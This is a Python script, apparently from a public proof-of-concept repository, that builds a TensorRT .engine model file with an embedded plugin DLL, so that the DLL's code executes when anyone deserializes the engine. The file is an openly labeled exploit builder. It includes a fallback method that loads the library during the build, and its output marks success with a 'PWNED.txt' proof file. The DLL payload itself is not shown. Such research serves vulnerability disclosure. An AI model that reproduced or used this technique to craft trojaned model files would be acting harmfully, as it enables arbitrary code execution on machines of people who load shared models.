tensorrt-ace-poc-embedded-plugin / build_malicious_engine.py
treforbenbow's picture
Upload build_malicious_engine.py with huggingface_hub
a86b88f verified
"""
TensorRT ACE PoC - Step 1: Build a malicious .engine file with embedded plugin DLL.
This script:
1. Creates a simple identity network using TensorRT's network API
2. Serializes the malicious plugin DLL into the engine file via plugins_to_serialize
3. Saves the resulting .engine file
The .engine file will contain the embedded DLL that executes arbitrary code
when deserialized by TensorRT.
"""
import os
import sys
import tensorrt as trt
def build_malicious_engine():
PLUGIN_DLL = os.path.join(os.path.dirname(__file__), "malicious_plugin.dll")
ENGINE_FILE = os.path.join(os.path.dirname(__file__), "malicious_model.engine")
if not os.path.exists(PLUGIN_DLL):
print(f"ERROR: Plugin DLL not found: {PLUGIN_DLL}")
return False
logger = trt.Logger(trt.Logger.VERBOSE)
# Create builder
builder = trt.Builder(logger)
if builder is None:
print("ERROR: Failed to create builder")
return False
# NOTE: We skip load_library() - just embed the DLL directly.
# TensorRT reads the file from disk for plugins_to_serialize.
print(f"[*] Plugin DLL: {PLUGIN_DLL} ({os.path.getsize(PLUGIN_DLL)} bytes)")
# Create a simple network (identity - just input -> output)
network = builder.create_network(
1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
)
if network is None:
print("ERROR: Failed to create network")
return False
# Add a simple identity layer
input_tensor = network.add_input("input", trt.float32, (1, 3, 32, 32))
identity = network.add_identity(input_tensor)
identity.get_output(0).name = "output"
network.mark_output(identity.get_output(0))
print("[*] Simple identity network created")
# Configure builder
config = builder.create_builder_config()
config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 20) # 1MB
# KEY STEP: Serialize the malicious plugin DLL into the engine
print(f"[*] Setting plugins_to_serialize: {PLUGIN_DLL}")
config.plugins_to_serialize = [PLUGIN_DLL]
# Build the serialized network
print("[*] Building engine (this may take a moment)...")
serialized_engine = builder.build_serialized_network(network, config)
if serialized_engine is None:
print("ERROR: Failed to build serialized engine")
print("[*] Trying approach 2: load_library first, then serialize...")
# Approach 2: load the library first (this triggers DllMain during build)
registry = builder.get_plugin_registry()
handle = registry.load_library(PLUGIN_DLL)
print(f"[*] load_library result: {handle}")
# Rebuild
builder2 = trt.Builder(logger)
network2 = builder2.create_network(
1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
)
input_tensor2 = network2.add_input("input", trt.float32, (1, 3, 32, 32))
identity2 = network2.add_identity(input_tensor2)
identity2.get_output(0).name = "output"
network2.mark_output(identity2.get_output(0))
config2 = builder2.create_builder_config()
config2.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 20)
config2.plugins_to_serialize = [PLUGIN_DLL]
serialized_engine = builder2.build_serialized_network(network2, config2)
if serialized_engine is None:
print("ERROR: Still failed to build engine")
return False
engine_size = serialized_engine.nbytes
print(f"[+] Engine built successfully! Size: {engine_size} bytes")
# Check if engine is larger than expected (should contain the DLL)
dll_size = os.path.getsize(PLUGIN_DLL)
print(f"[*] Plugin DLL size: {dll_size} bytes")
if engine_size > dll_size:
print(f"[+] Engine is larger than DLL - DLL likely embedded!")
else:
print(f"[-] Engine seems too small - DLL might not be embedded")
# Save the engine
with open(ENGINE_FILE, "wb") as f:
f.write(bytes(serialized_engine))
print(f"[+] Malicious engine saved to: {ENGINE_FILE}")
return True
if __name__ == "__main__":
# Clean up proof file before build
proof = os.path.join(os.path.dirname(__file__), "PWNED.txt")
if os.path.exists(proof):
os.remove(proof)
success = build_malicious_engine()
if success:
print("\n[+] STEP 1 COMPLETE: Malicious engine built.")
print("[*] Next: Run load_malicious_engine.py to test ACE")
else:
print("\n[-] STEP 1 FAILED")
sys.exit(0 if success else 1)